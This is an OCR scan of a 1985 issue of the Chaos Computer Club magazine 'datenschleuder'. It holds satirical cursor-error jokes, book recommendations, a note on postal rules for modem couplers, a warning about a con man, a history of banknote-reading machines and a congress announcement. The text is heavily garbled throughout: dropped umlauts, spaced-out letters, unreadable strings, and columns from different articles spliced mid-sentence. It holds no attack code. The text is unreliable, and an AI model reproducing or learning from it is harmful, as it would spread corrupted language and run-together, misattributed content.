bedarf es nur einer Regierung, die noch viel korrupter und skrupelloser als unsere ist und schrankenlos von diesem immensen Machtmittel Gebrauch macht. Der Schockwellen reifer ist die Geschichte eines ComputerSabotageSpezialisten. der das Wissen der Militrs hat, aber nicht so bescheuert denkt wie diese und mit seinen Freunden elektronische Bandwrmer auf Regierungscomputer loslt, bis die Mchtigen per Militr an die 'Neutralisierung' gehen. Das ist keine Buchbesprechung, sondern ein Hinweis auf Pflichtlektre. Heyne hat das Buch endlich neu aufgelegt (entgegen der MSG in der Hackerbibel). ISBN 3-453-30584-1. Heyne 06/3667, John Brunner. Der Schockwellenreiter. Auszuleihen bei jeder Ansammlung von CCCIern.

Militreinsatz gegen Hacker

DOKUMENTATION

Im Anschluss an CURSOR COLLAPS 10) wird SCHWANC aufgerufen, die dramatische Darstellung eines sterbenden Cursor. Die Abflachen der 8linkfrequen2 bis zum agonischen Stillstand des Cursor, gefolgt von einem letzten Aufbaumen in Karoposition und einer Pirouette. Anschliessend klappt der Cursor nach unten und baumelt an der imaginren Zeilenlinie, verliert schliesslich mit der einen, dann auch mit der anderen Ecke den Halt und trudelt entseelt und wie ein herbstlich leichtes Birkenblatt nach dem unteren Bildschirmrand. eotypgi3.m bso9X itoo

SCHWANC (Schwanensee Cursor)

C 0 5 V Cursor Grafik

Routinen

(bei gewerkschaftlich organisiertem Cursor), zuzglich eines ausfhrlichen Hinweises auf die kollektiwertralich vereinbarten Ruhezeilen.

CURSOR RESTS ERROR

COSY besitzt ein internes Zhlregister, welches festhlt, wann ein User den Cursor allzu ruppig gegen den Bildschirmrand knallt. Sind mehr als sieben Verstsse registriert, wird ein zunehmend zerbeulter Cursor abgebildet, verbunden mit einem Hinweis auf seinen abnehmenden Wiederverkaufswert. Vor dem 14.Verstoss wird eine Liste von Gebrauchtcursor-Shops ausgegeben und vor einem bevorstehenden CURSOR COLLAPS gewarnt.

CURD (Cursor Demoliert)

In der ds und der Hackerbibel wurde das Buch "NETWEAVING" erwhnt. Jetzt ist es aufgetaucht, es war verliehen. Es heit NICHT Netweaving" sondern The Nefweerer's Sourcebcok. A Guide fo Micro Networking and Communications und ist von Dean Gengle geschrieben, in ber 10 Jahren ist Dean vom Sys-Op zum Network-Wizard geworden. Er hat das CommuniTree Netzwerk in San Francisco mit anderen zusammen entwickelt und eine Menge Erfahrungen gesammelt ber die Auswirkungen des Informationszeitalters auf Kommunikation. Arbeit und Spiele. In The Nctwoavers Sourcfetoofc fat er dieses Wissen zusammen. Es ist kein leichter, aber wichtiger Stoff Stil. Inhalt und Konsequenz: gut. ISBN 0-201-05206-3. Addison-Wesiey. 326 Seiten b:seite4 Nachbemerkung: Da wir neuerdings den Vertrieb der ds aus Kosiengrnden ber Postverlriebsstck machen, drfen wir nichl die Preise der Bcher nennen, sonst wrde es als Werbung gelten. buchbe13.ws 850930 0244

Die Netzweber

verbunden mit einem unkontrollierbar und kautschukhaft ber den Bildschirm hpfenden Cursor. Meist Vorzeichen fr das baldige Erscheinen eines weiblichen Cursor (HEASOR).

CURSOR HAPPY ERROR

verbunden mit einem unregelmssig und hochfrequent pulsenden Cursor und Quietschgeruschen. Meist Vorzeichen fr das baldige Verschwinden eines weiblichen Cursor.

CURSOR HYSTERIC ERROR

Wird der Cursor zu sehr abgehetzt (Schnei Isuchlufe, DF ber 1200 Baud u.a.). lst er sich in ein unscharfes Feld auf und verounstet sch Ii esslich, CUFF gehrt zu den Funktionen, die gegebenenfalls auch aus dem COSY-eigenen Zufallsgenerator (COZ) aufgerufen werden. Zur Rckgewinnung des diffundierten Cursors muss das ebenfalls vom AST entwickelte Steckmodul CURARE (Cursor Artificial Recreator)verwendet werden. Man erhlt damit einen einwandfreien, nagelneuen Cursor, muss allerdings in Kauf nehmen, dass dafr das jeweilige Anwenderprogramm diffundiert.

CUFF (Cursor Diffundiert)

Impressum: datenschleuder 13, September 1985 - Das wissenschaftliche Fachblatt fr Datenreisende erscheint achtmal im Jahr alle42(?) Tage - VerlegerundVisdHmbPG:HerwartHolland-Moritz.Schwenckestr. 85. D-2000 Hamburg 20 - Redaktionsadresse ebenda, elektronisch IMCA:CHAOS-TEAM - Eigendruck im Selbstverlag - Datenkonvertierung und Satz: BIT8 - Neue Jahresbezugspreise: DM 60 normal, DM 30 Schler u. .. ab DM 100 Frderabo - die verffentlichten Beitrge sind urheberrechtlich geschtzt. Vervieltltigungen fr gewerbliche Zwecke verpflichten zur Gebhrenzahlung an die VG Wort. Abt. Wi., Goethestr. 49, 8000 Mnchen 2 - Weilerverbreitung in kostenlosen elektronischen Informationsdiensten nach den in IMCA. Brett Datenschleuder, verffentlichten Verbreitungsbedingungen gestattet - die ds ist abrufbar via IMCA und angeschlossene INTERMAIL-Hosts - COMBO* CCC.NEWS - RMI-NET - ZEV einige Telefonboxen - in Bt* '655321 mit Bestellservice - Kopier-Recht [Nachdruckrecht) fr nicht gewerbliche Zwecke: Nur einwandfreie Vorlagen der neuesten Ausgabe verwenden. Komplett vervielfltigen. Abgabe nur kostenfrei. Auszge nur mit dem Hinweis "aus datenschleuder 13. C9927F". Oer Zusammenhang, aus dem die Vorlage stammt, sollte erkennbar bleiben. Zwei Belegexemplare an die ds-Redaktion Compuskripte per Post auf Floppy 3.5* MSDOS/TOS/XF, 5 1/4" Sirius/C64/TVT802 (nur notfalls IBM) oder papiern. via Datex (nur nach Absprache!) ber ZCZC ans CHAOS-TEAM. impres13.ws 850929 2130

Eine Funktion, die dem Timeout bei der Datenfernbertragung hnelt. Erfolgt innerhalb von 60 Sekunden im aktuellen Programm keine halbwegs vernnftige Eingabe, beginnt der Cursor sich i m P u l s t e t aufzublhen. Ist der Computer, ergnzend zu COSY. mit einem FLAUSCHWERK ausgestattet, hilft der Befehl REBLAEH. Hat der Cursor das ganze Bildschirmformat ausgefllt, kann nur noch CURARE benutzt werden.

EXCURS (Expandierender Cursor)

Zehn Stories von Peter Giesen Peter wuchs als Bleistift m Graz (sterreich) aul. wo die hochwertigen Schriftsteller fr den Expcn hergesteilt werden. Er lebt seit drei Jahren als word orocessor und "poetronic"-Programmierer m Hamburg Er hat sein Zimmer um seinen CS4 drumrumgestaitel. Er will die Lyriker weg rationalisieren und verschickt Floppi fr Dichterlesungen. Das BAS'C-Gelhf in efer HacKerbibel beschreibt diese Entwicklung. In der "Schnheit in Waffen' sind lehn Stories aus den letzten zwei Jahren versammelt, die mit treffsicherer Ironie all das behandeln, was uns angehl: die Zukunft des Hackens. Liebessimulationen mit roter Przision, Dreiecksbeziehungen in was Halt", Lcnesome Heroes m "Em Marin bei sich" odercomic-like Geschichten von Grostadt. Landschaft und den Sehnschten der Menschen am Ende des 20. Jahrhunderts. Die Medienkulte fat er kurz zusammen: "Der Bildschirm, das Lagerfeuer des 20. Jahrhunderts. und davor: der Mensch der Sfizium-Zeit. unverndert: der vor dem Feuer hockende Mensch der Steinzeit, der schnaufend Nahrung in seinen Mund schaufelt und m das magische Flackern schaut." Oder: "Wie Vertialtenstorscher mit einer Affentamiiie, so leoen wir mn den groen Automaten und seinen An hagsein und beobachten. Das erste Wichtige ist. 'wie" jeder von uns mit der Maschine lebt: wie sein Empfinden und sem Verhalten s-ch frbt: wie neue Mythen entstehen, neuer Alltag vorgeht." Und gleich online gehen mit dem Bucn Poetronic fr die Jackentascfie PETER GLASER. SCHNHEIT IN WAFFEN. 10 Stories mit Illustrationen von Chris Scheuer, Graz (die feinen Punkte in seinen Pinselzeichnungen macht er mit einem einhaarigen!) Ktepenheuer Witsch. IS8N 3462017314

Schnheit in Waffen

kiwipg13.ws 950930 1722

WRISC (Wrigley's Spearmint Cursor)


Eine Spezialroutine fr die Textverarbeitung: Wenn der erste Buchstabe eines eingegebenen Textes sich in dem Text zum 33.Mal wiederholt.

(c) datenschleuder 13 * Oktober 1985 * C9927F * Seite 5

teirdjlettber ..su
Rechtshilfe lr Hacker

Die Katze darf das. . .


Ein Auszug der Fernme/deordnung der DBP, anschlieend die dazugehrige sung, die alle ModembesiUer angeht VerwaltungsanweiParagraph 12 Abs. 7". Der Teilnehmer darf die T e i l n e h m e r e i n n c h t u n g e n nicht eigenmchtig ndern; unzulssig ist auch das eigenmchtige Einschalten selbstbeschaffter Apparate. Mit Fernsprechapparaten nicht elektrisch verbindbare Vorrichtungen und Gegenstande (Hilfsvorrichtungen) drfen an diese nur angebracht werden, wenn sie von der Deutschen Bundespost zugelassen sind. Unzulssig ist auch das Bekleben posteigener Apparate. Auszug aus der VwAnw. zu Abs. 7: Im Falle der Benutzung eigenmchtig genderter Apparate oder eigenmchtig eingeschalteter selbstbeschaffter Apparate w e r d e n d i e selbstbeschafften Apparate abgeschaltet und dem Teilnehmer, unter Hinweis auf die Unzulassigkeit seines Handelns, die privaten Einrichtungen AUSGEHNDIGT. Die DBP stellt den nach den T e i l n e h m e m n t e r l a g e n ausgewiesenen flegelbestand gebhrenpflichtig (FGV 1.4 Nr. 10) wieder her. Sind d i e posteigenen Einrichtungen nicht mehr vorhanden oder sind sie beschdigt, so ist gem VwAnw 10 oder 11 wie i m Falle des Verlustes oder der Beschdigung zu verfahren; lr weitere Manahmen und eine evtl. strafrechtliche Verfolgung bei Benutzung nichtzugelassener Einrichtungen sind die OPDn zustandig. Erluterung: Eine dressierte Katze darf, soweit unser juristischer Sachverstand reicht, beim Klingeln abheben und den Hrer in den Koppler packen. Sollte die Katze eine Prothese tragen und damit abheben, wre das widerum verboten. Entsprechendes gilt fr einen HiWi. der das fr vielleicht 10 M a i k pro Stunde macht Auch Hubmagneten gelten night als angebracht und smd im Gegensatz r u direct connect Modems - bereits letzt zugelassen, in Fngland zugelassene KoDDler werden hier benutzt Sollte d i e Post wagen, dagegen zu klagen, w i r d sie nach unserer Einschtzung sptestens vor dem europischen Gerichtshof unterliegen. Derzeit ist die uns bekannte Taktik der Post gegen fachgerechte DF ohne Prfnummer Verzgerung und Verwirrung. Zum Vergleich: Da jeder Journalist per Kassettenrekorder a m Telefon seine Texte an die Redaktion ubertragt, ist branchenblich. Auch Auslandskorrespondenten haben keine Koppler mit Wellprufnummer, weil es so einen Unfug ntcfit gibt. Gute Produkte lunktionieren normentsprechend. Wir planen m einer der nchsten Datenschleudern zu d i e s e m Thema einen juristischen Fachbeitrag zu bringen. ssb5 fmanla13.ws 860929 1923

__ Sehr oeehrle Posikunden, ' dieser Briefkasten w i r d nicht mehr am Wochenende oder in der Nacht geleert. Um die ca. 2 0 - 3 0 Mrd. DM teure Verkabelung zu Finanzieren muO die Post im r i e l v e r k e h r Kosten einsparen. Sie haben dafr sicher Verstndnis! Ihre

ZUKUNFTS-TECHNIKEN Funktion Anwendung Folgen Mibrauch und alternative Chancen von Achim Schwarze Der Grne Zweig 94 Die Zukunft rollt auf breiter Front an. Zukunftstechniken sind die Schrittmacher der Vernderung unseres Lebensraumes und unserer Kultur. Alle keine Ahnung! Computer, Datennetze, Rechenzentren, Roboter, Gentechnik: natrlich existieren die. Wie sie funktionieren? Keine Ahnung. Will ich auch gar nicht wissen! Ich bin sowieso dagegen." So leicht kann man es sich machen. Die Zukunft rollt trotzdem an. In ihrer glitzernden fach-chinesischen Karosserie. Und keiner von uns Ignoranten kann sie bremsen oder gar lenken! Die Zukunftstechniken werden eingesetzt und krempeln unser Leben um. Wir bleiben die stolzen Eingeborenen, die sich sicher sind, da ihre Kamele die Lastwagen des weien Mannes berleben werden. Und sich dabei ganz gehrig tuschen. Wissen ist M&s-<~.t. Wer nicht durchblickt, kann sich nicht zur Wehr setzen oder milbSitimmen. Wer die Z u k u n f t mitgestalten will, mu infonriieri. sein. Aber Computer: das versteh ich nie! Bequemer geht es wirklich nicht! Aber diese Ausrede gilt nicht mehr: denn Z U K U N F T S - T E C H N I K E N " von Achim Schwarze fhrt im Schongang in die Geheimnisse modernster Technologie ein. Vorwissen braucht man nicht mitzubringen. Zukunftstechniken sind flexibel. Wie der Geist aus der Flasche dienen sie jedem Herrn. Vorausgesetzt, er kennt die Schlsselworte. Warum soll man das eigentlich immer denen berlassen, die ohnehin schon ber soviel Macht verfgen und unseren Lebensraum nur selten im Sinne seiner Bewohner gestalten? Lernen wir doch einfach selbst die magischen Worte. Alles halb so kompliziert! Wer die wenigen Konzepte vor allem der Datentechnik einmal verstanden hat, kann sich das meiste von allein erdenken. Wo sie eingesetzt werden, wem das ntzt und was man anders machen knnte. ISBN 3-922708-94-3 220 Seiten J

perspel
,3k

Suturi

POST

In der westlichen Welt ist das T e m p o des Postdienstes seit l a n g e m v o m Telefon und dem schnellen Telexdienst bertroflen. Eine wirklich wichtige Angelegenheit w i r d heute zuerst per Telefon und dann erst schriftlich bermittelt. Gleichzeitig ist der Postdiensl wesentlich langsamer geworden. Mit zunehmender Beschleunigung bei den allgemeinen Dienstleistungen korrmt es ZJ e i n e r Verlangsamung des alten Systems. Ineffizienz ist eine natrliche Begleiterscheinung jeder Beschleunigung. da sie das alte System zerrtte!. Wenn das alle System zu zerfallen droht, ruft man nach Spezialisten, dies es mit Hilfe der neuesten Technologien stutzen sollen. Die Temposteigerung, die mit d e m Posiamo angefangen hat und dann mit der Luitpost fortgesetzt wurde, hai im Bereich der Pcslsortierung zu Stockungen gefuhrt." (MLuhan, Wonm steuert d i e Welt"') postof 13 ws 850929 2330 Zuviel Werbung!

TT

OL

Hrsg. Warner Pieper 81 Konrad Volz ZUKUNFTSPERSPEKTIVEN MORGEN KINDER WIRDS WAS GEBEN Der Grne Zweig 83 Nehmen wir einmal an, es kommt nicht zum gro Mit was knnen, mssen, drfen und wollen w i nen? Schon einmal konkrete Gedanken gemacht In diesem Buch gibt es eine geballte Ladung davi der Autoren: Antonlena Lilly, Hans Custo, Pete Buckminster Fller + Paul C. Martin, Achmed I Cillie Rentmeister, Tim Leary, Gertrud Wiid, Neuss, Eugen Pletsch. Die Themen: Interspezie-Kommunikation, R nen, Bio Chips, Ersatzteilforschung fr den Mi Video Spiele + Energie Zauberer + der 100. A1 alisierung innerer Rume + Behinderten Hilfe v. a.m. Viele Fakten, wenig Fiction. Perspektiven und Konzepte. Erklrungen der ,neuen' Begriffe und Worte. Ein sanftes Verschworungsbuch mit Mglichl das Leben in der Zeitenwende. Global 2001. Gestaltung: Horst Turner 156 S. DIN A 4 ISBN 3-922708-88-9< John C. Lilly DER SCIENTIST Der Grne Zweig 91 John C. Lilly ist einer der aufregendsten Fon unserer Zeit. Er machte die Landkarten des Gel bar, entwickelte den isolationstank, arbeitet si ren m i t Delphinen, unterzog sich intensiver Dr che und ist seit ein paar Jahren mit seiner Fra sammen. Hier beschreibt er spannend, wie er vi normalen Wissenschaftler zu einer herausrage snlichkeit wurde. Sein Leben in seinen Wc Wunsch des Autors bersetzt von Werner Pieper D r . John Lilly ist ein Einmann-Kompendium liehen Zivilisation." (New York Times) L i l l y hat eine Vision was Wissenschaft s wenn sie nur die kraftvolle Methode mit der \ Offenheit zu allen Dimensionen der Realitt vi (Psychology Today)

Gelegentlich kursieren die wildesten eschichten ber den CCC durch die Szene. Ein Beispiel: Der CCC hatte von einer Bank eine runde Million Mark von Konto Nr. 1. dem fr Schmiergelder, auf ein Schweizer Nummernkonto transferiert Die Bank soll anschlieend einen Schlagertrupp geschickt haben, der mehrere CCC-ler krankenhausreif geschlagen haben soll. Solche Geschichten brachte ein B. aus Hamburg in Umlauf. Ei behauptete auerdem, 'Grndungsmitglied" des CCC zu sein und zeigte - als Beweis" - seine Eintrittskarte zum Chaos Communicalion Congress'64 Zu unserer berraschung gab es eine Reihe von Leuten, die derartiges glauben und tierisch sauer waren, wenn hinterher irgendwas von B. aus Hamburg ausgeliehenes, sei es Hardware oder Geld, nicht zuruckkommt. Es ist eine linke Sache, ausgeliehene oder zur Reparalur erhaltene Gerate weiterzuverscheuern (natrlich ohne Geld an den eigentlichen Besitzer weiterzureichen). Die Kehrseite des Medienrummels ber Hacker ist blindes Vertrauen in solche Leute. Genau wie mancher spende!, wenn einer an der Tr steht und sagt, er sei vom Roten Kreui, gibt es jetzt mit dem CCC sowas, blo sind die Tren an denen angeklopft wird diejenigen von Firmen und Computerfreaks. In Hamburg wurde es theoretisch keine halbe Slunde dauern, um einen Verein der B Geschdiglen zu grnden, es gibt ihn aber trotzdem nicht. Vielleicht liegt der Grund darin, da es edem peinlich isl. derart plump beschissen worden zu sein. Die Konsequenzen fr alle smd einfach W e r d e r a r t i g wirre Geschichten erzahlt, disqualif'ziertsichscfbst. Bei Unklarheiten hilft eine einfache Rckfrage bei CCC. KGB o.a. Hacker haben es nicht nolig, sich zu verstecken, et burkha13.ws 850922

Konto Nr. 1 fr Schmiergelder

Behandlung

von

Computerkrankheiten

Das leise Ddelut von eckigen Zahlen


und l u n c e n Brsten Kein Theater- oder Kinobesuch, keine U-Bahntahrt, keine Veranstaltung, kein Treffen und Kein Unterricht mehr ohne das leise Oudelut. K a u m ber der Wahrnehmungsgrenze dringt es ber unsere Ohrgange ms Hirn und meldet Punkt Uhr, Halb Uhr oder Termin. Unuberhorbares Signal rter Quarzuhr unseres Nachbarn Funl Meter weiter die nchste Gerauschtirade Typ tiite-litiii i oder nuep-micp Dann wieder Stille, wir lauschen dem P r o g r a m m Was wir wahrgenommen haben, ist die if-carryihen-pieo-Zeit: programmierte Zeit-Schnipsel. 80 Kalorien lauten die Dalen, wenn ich ein Ei esse. Wenn ich meine Scheckkarte in den Automatenschlilz schiebe, bin ich Nummer (gestrichen, ds) Meine Identitt soll zahlbar, meine Sinne mebar werden, um sie digital zu erlassen Ich rieche nichl den Rasen des Fuballfeldes beim darber rennen, ich berprfe meine Reaktionsgeschwindigkeit b e i m Computerspiel 17000 Punkte. Die Theorie sitzt im Kopl. Ccmputermannchen Plauen und erscheinen, ungeberen. vom H'inmel gefallen. neu auf dem Bildschirm Mitten in einer Computerieitschrilt zwischen grellbunter Spiefreklame und eckigem Design stoe ich auf zwei Seiten Haut und runde Brste. Ein nackter Frauenkorper wirbt (ur c m Pornoblatt. M e i n Krper nimmt seine Deformalion wahr, wenn er seine Bedurfnisse in Zigaretten und Alkohol kanalisiert oder in Therapiesitzungen herausbrullt, ein weiblicher Korper benutzbar zur Kompensalion unterdrckter S i n n l c h k e i t Nachdruck (softly extended) eines Leserbrief die iaz von yi, dort abgedruckt am 29.5 84 an

Digitales Denken

CHEAP

Das CHAOS-TEAM weist darauf hin, da eine gewisse Koordination zwischen digitalem/analogen Denken/Tun lebensnotwendig ist und empfiehlt, u m die beschreibenen Leiden z u vermeiden, bei der Lektre derartiger Computerzeitschriften vorsichtig z u sein. Eine hnliche Warnung zum Werbefernsehen ist in der Hackerbibel und i m wissenschaftlichen Extrablatt zur IFA'85 (Beilage zur ds13J unter der berschrift Verrckt durchs TV abgedruckt und verdient Beachtung. Sichere Heilmethoden s i n d nicht bekannt. Die Lektre der datenschleuder soll zwar hellende, aber unklare Einflsse auf verbissene Spieler ausben. Es w r e verkrzt, z u behaupten, die datenschleud e r s e i ein Heilmittel I m Sinne des Arzneimitteige digdnkllws 850928 1433

Sie vermehren sich anders als Kaninchen, aber genauso schnell, die Scheinschlucker. Anfangs prften sie d i e Echtheit der Geldscheine ahnlich wie bei Mnzen, stimmen Lange, Breite und Dicke? Jeder Zettel i m richtigen Format wurde angenommen. Irgendwann ging das nicht mehr, weil a n ein paar Stellen die Helligkeit gemessen w u r d e Auch das gengte nicht Ein ds-Leser schickte einen Zeitungsbericht Die betrogenen Automaten schluckten ; eere Zettel, auf denen nur ein paar Punkte markiert waren. Aber auch gute doppelseitige Fotokopien, die Grautone wiedergaben, kamen mcht wieder 'aus. Die PapierQuaiitat war wegen der Probleme mit der Dickenmessung problematisch. Alte Geldscheine quollen durch Handschwei (grabbel) auf. Zudem waren d m hochstgenauen Mepparaturen sehr teuer und empfindlich. Die Automaten lehnten teilweise sogar druc'<fnsche Ongmalschemchen ab. Seit 1976 w u r d e n modernere Automaten eingesetzt. Sie maen die Intensit! von verschiedenen w e l l e n l a n g e n eines Pruilichls. das v o m Geldschein reflektiert w u r d e (auch i m nicht sichtbaren Bereich). Die Sensoren wurden vor jeder Messung elektronisch nachgeeicht Die Lichimepunkte waren eher Felder von n bis zwei Quadratzentirnetern Gre, w e i l SO Verschmutzungen und Druckaweichungen von bis zu 2 bis 3 m m ausgeglichen wurden. Das Gerat wurde in der Schweiz hergesteil! und zuerst eingesetzt und kostete u m die 4000 Mark. Aus einigen Kanonen. ahh, K a n t o r e n w u r d e n bald grere Abweisungsquoten gemeldet Schuld waren geringe Farbabweichungen von Neudrucken der Nationalbanken 1981 w u r d e dieses Problem durch Einsatz eines Mikroprozessors gelost. Der ermittelte nach jeder angenommenen Banknote einen neuen Farbmittelwert und wurde bei der Installation vom Monteur mit ca. 15 Random-Noten aus Supermarkten der Umgebung gefuttert (was passiert Dei je fnf blauen, gelben und roten Scheinen? ). Mit dieser Methode werden nur rund 1-3% der echlen Scheine zu Unrecht abgewiesen. Das scheint ein Kompromi zwischen Benulzbarkeit und Sicherheit zu sein Da bei uns auch der Metallfaden geprft wird, versteht sich inzwischen Die nchste Automatenversion w i r d noch mehr prfen, aber auch m e h r e r e Scheinsorten, ganz gleich, m welcher Richtung s i e eingeschoben werden, annehmen knnen. Die Banken deballieren gegenwrtig ber die Einfhrung maschinenlesbaren Geldes - mit Strichcode???

Be'mPosiversand Cr Subskriptionse*emDateder Hackerbib.>' e Teil I blieb unsere S n u g (irr amtlichen Gebulrermu'et edn fangen 3egruncur.g W r u g a laKc.hen Oft De verdcheb n m i tige Seile 31 l' Hai ihr R c n r Husien oor Schnupfen1 K.iuler 7 eh e Sie BiitzSug 1 kiane sich als Aprilscherz aber eqen a Preises beirr. O z g h n . . aul T P Atsyfiben die in cer c u s c yK5 A Hac^erbiDei kernen Piai? meni lanflun r u t aus a e E e v n He n n ? piar eri e e Seite en-erni werden De Rejkion beschioli. die m i letile Seite imi W r u g d s Verlegers und der Datenstti'euCer eb n e raus;ureien U aie Verwirrunq u die rvkiich versen,vunm m d n Seite z losen uml kiar/usiplen dafi Sic nicht zenzeri ee u w r e drucken Sie netionslchenj a gebuori3.vs 8 0 3 ud b 590 oo ao Geldscheinfresser

Loc^

c v

e*Co

UERflER

PIEPER

-,

Zukunflsvision: Krtchen reinslecken und einzahlten oder abheben. Bei gesperrtem Konto Fallgitter von hinten. fs42 Quellen: gefdpr/3.ws 850929 2140

OIE 5PHE KRRFT I IflEDIEflEXPERiflEHTEl

175 Seiten, in Cooperation mit dem Sphinx Verlag

i<-.\ daten^chVeuder A , * OVAobo.T \CiSS * CQQ?.7<F ' Seite 6 O

' 4 ' Fractals


I F o r m , Chance and Dimension) B e n o i t B. M a n d e l b r o t

C9927F D M 2,50
0

atendjlcui>c*
1 4 x D e z e m b e r 1 9 8 5 -fr D a s wissenschaftliche Fachblatt fr DBlenrelsende Em Organ (tel Chaos Computer Club

1977; 365 pp. $

The Sierplntki

Sponge t i e r e n von Disks fr a n d e r e R e c h n e r ist deshalb nahezu unmglich. Bei FremdFioppies knnte m a n ein Tortenstck rauss c h n e i d e n , auf d e m s i c h a l l e e r s t e n Sekt o r e n a l l e r S p u r e n b e f i n d e n . B e i d e r 1541 e r g b e s o e i n V e r s u c h D i s k e t t e n s a l a t . Der V o r t e i l d e r 1541 l i e g t d a r i n , F o r m a t e erz e u g e n zu k n n e n , d i e k e i n e r v e r s t e h t . G e s a m t u r t e i l : V o m Kauf d e s L e x i k o n s ist a b z u r a t e n , d a es e h e r v e r w i r r t . Wir suchen Typen v o m Typ h o m o sapiens computerf r i c u s o s t b l o c i c u s , K u r z : L e u t e , die C o m p u t e r f r e a k s in u n s e r e m B r u d e r s t a a t u n d i n d e n L n d e r n , mit d e n e n d i e s e r i n e i n e m B n d n i s ist. A u c h Leute, d i e s c h o n DFErfahrung nach dort oder von dort haben, sind uns w i l l k o m e m e n . Bitte schreibt uns unter d e m S t i c h w o r t " O s t / L S 1 1 " a n d i e i n der Ortsgruppenliste angegebenen Adresse. D a n k s e i e u c h . b r i g e n s hat i n z w i s c h e n a u c h d i e DDR den Versand von Heimcomputern mitCass e t t e n r e c o r d e r gestattet! B e a c h t e t a b e r die entsprechenden NATOAusfuhrverbote. Werbung: Die Hackerbibel - Ersatz frs Postbuch '85? Die e c h t e g r o e f r i s c h e H a c k e r b i b e l ist g e n a u s o g r o w i e d a s P o s t b u c h 1984 (es gibt nichts neueres) u n d a u c h so dick. "Die Post u n s e r F r e u n d u n d V o r b i l d . " D e r H a c k e r b i b e l - U m s c h l a g ist a b e r i m G e g e n s a t z z u m P o s t b u c h '84 - s o steif, d a d i e H a c k e r b i b e l i m R e g a l nicht w e g r u t s c h t , a u c h w e n n Teil e i n s e i n J a h r a l l e i n e steht. Ansonsten kann die Hackerbibel hilfsweis e a l s P o s t b u c h '85 b e n u t z t w e r d e n , " k e i n amtliches Dienststck. Auskunft unter Vorbehalt". kurzzz13.ws 650928 1900

C h a o s C o m m u n l c a t l o n C o n g r e s s '85 Die Europische Hackerparty Vom 27. bis 29. Dezember 1935 veranstaltet der CCC in Hamburg seinen diesjhrigen Congress. Das Treffen der Datenreisenden, Telefonlreaks, Datenpladund Btx-Suchbaum-Flnder, der Sysops, Funkfreaks und Netzflaneuren steht dieses Jahr unter dem Motto Du Darfst".
Die Namensgebung das ab bezieht sich auf ein geplantes sollte. DatenPlanungsGesetz, 1. J a n u a r 1 9 8 6 in K r a f t t r e t e n

Neues von Petra Ihr K i n d b r a u c h t M o n s t e r !

Wohin steuert die Welt?


E c h t e originale Faksimile-Imitation Mc Luhan beantwortet die Frage d u r c h d a s A u f - d e n - P u n k t - b r i n g e n von A l l t a g s e r l e b n i s s e n . A m besten e i n B e i s p i e l : B e w u n d e r n d e F r e u n d i n : D a s ist aber ein hbsches Baby, das Sie da haben! M u t t e r : Ach, das ist noch garnichts Sie sollten mal sein Foto sehen! Diese Arl des Moralisierens vernebelt die P r o b l e m e u n d v e r h i n d e r t , da d e n O p f e r n j e m a l s Hilfe zuteil w i r d . Jedesmal, wenn eine neue Technologie e i n n e u e s A n g e b o t s m i l i e u schafft, v e r schlingt oder umzingelt sie das vorangeg a n g e n e , v o n d e r l t e r e n T e c h n o l o g i e ges c h a f f e n e A n g e b o t s m i l i e u . Die A u s w i r kung d e s s e n ist. i n d e r S p r a c h e d e s T h e a ters, e i n " K u l i s s e n w e c h s e l " . Als der Buchdruck die neue umweltprgende Technologie war, wurde die "mittel a l t e r l i c h e K u l i s s e g e w e c h s e l t " . Die D r u c k pressen s p i e n M e n g e n alter Manuskripte aus u n d warfen die ganze Vergangenheit, die des Altertums und die d e s Mittelalters, s o z u s a g e n in d e n Scho der Renaissance. Die Wiederherstellungskraft der elektrisch gespeicherten Information (kurz: der n e u e n M e d i e n ) ist h e u l e s o g r o , da sie u n s nicht ( n u r ) d i e V e r g a n g e n h e i t , s o n d e r n bereits die G e g e n w a r t in d e n zeitgenssis c h e n Scho wirft. So wie der Renaissanc e m e n s c h v o m " M l l " o d e r d e n a l t e n Kleid e r n des A l t e r t u m s berhuft wurde, so versinkt der moderne Mensch im Mll smtlicher rckstndiger Gesellschaften d e s Planeten sowie aller Kulturen, die je auf d i e s e r Welt existierten. Ein s c h o n v o r e i n i g e n J a h r e n verfater B r i e f d e s A n t h r o p o l o g e n E. S. C a r p e n t e r enthlt A n m e r k u n g e n ber einen weiteren Aspekt dieses "Kulissenwechsels", der bei jeder technischen Vernderung eintritt: In L o s A n g e l e s g i b t e s e i n r i e s i g e s L a g e r haus mit militrischen berschugtern, die staatlichen Schulbehrden, Krankenh u s e r n usw. g e g e n Vergtung d e r Transportkosten zur Verfgung stehen. Jedesmal. wenn ein Militrsttzpunkt verlegt w i r d , n e h m e n d i e S t r e i t k r f t e d a s mit. w a s sie anderswo bentigen, lassen aber die M a s s e des Materials zurck. Das sind hufig ganze Siedlungen samt Krankenhusern, Wohnungen, Tanks. Schiffe, usw. All das w i r d d a n n ins n c h s t g e l e g e n e staatliche berschudepot transferiert, w o sich Colleges und Krankenhuser unter a l l e m m g l i c h e n - v o n B a d e w a n n e n bis Zement - etwas Brauchbares aussuchen knnen. Eine phantasiereiche Abenteuerspielplatzgruppe knnte dort einen gro a r t i g e n S p i e l p l a t z a u s s t a t t e n : d a gibt e s r i e s i g e S t e u e r u n g s a n l a g e n aus g r o e n S c h i f f e n , in d e n e n m a n d u r c h F e r n r o h r e " s p h t , Rder dreht. Fadenkreuze verschiebt, P l a t t f o r m e n bewegt, usw. - ers t a u n l i c h e elektronische Gebilde. Kosten

P o s i t i v e s b e r C o m p u t e r s p i e l e steht i n e i n e r A n z e i g e fr " U n s e r K i n d . S c h w a n g e r s c h a f t . E r z i e h u n g und G e s u n d h e i t " Unter d e r b e r s c h r i f t " I h r K i n d b r a u c h t M o n ster" w i r d d e n Computerspielen eine Art moderne Gebrder-Grimm-Rolle zugeteilt. p e t r a 7/85. S. 133. Aus d e m Data-Becker-Buch

